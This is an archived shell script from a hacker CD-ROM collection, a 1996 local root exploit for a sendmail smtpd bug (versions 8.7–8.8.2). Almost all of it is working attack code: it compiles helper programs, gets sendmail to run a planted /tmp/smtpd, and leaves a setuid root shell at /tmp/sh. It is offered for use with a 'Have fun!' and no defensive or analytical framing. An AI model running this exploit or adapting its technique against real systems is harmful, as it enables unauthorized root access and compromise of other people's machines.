home *** CD-ROM | disk | FTP | other *** search

---

/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / sendmail-ex.sh

< prev

next >

Wrap

Text File  |  2001-11-06  |  2KB  |  40 lines

---

1. #/bin/sh
2. #
3. #
4. #                                   Hi !
5. #                This is exploit for sendmail smtpd bug
6. #    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
7. #         This shell script does a root shell in /tmp directory.
8. #          If you have any problems with it, drop me a letter.
9. #                                Have fun !
10. #
11. #
12. #                           ----------------------
13. #               ---------------------------------------------
14. #    -----------------   Dedicated to my beautiful lady   ------------------
15. #               ---------------------------------------------
16. #                           ----------------------
17. #
18. #          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
19. #
20. #
21. #
22. echo   'main()                                                '>>leshka.c
23. echo   '{                                                     '>>leshka.c
24. echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
25. echo   '}                                                     '>>leshka.c
26. #
27. #
28. echo   'main()                                                '>>smtpd.c
29. echo   '{                                                     '>>smtpd.c
30. echo   '  setuid(0); setgid(0);                               '>>smtpd.c
31. echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
32. echo   '}                                                     '>>smtpd.c
33. #
34. #
35. cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
36. ./leshka
37. kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
38. rm leshka.c leshka smtpd.c /tmp/smtpd
39. echo "Now type:   /tmp/sh"
40.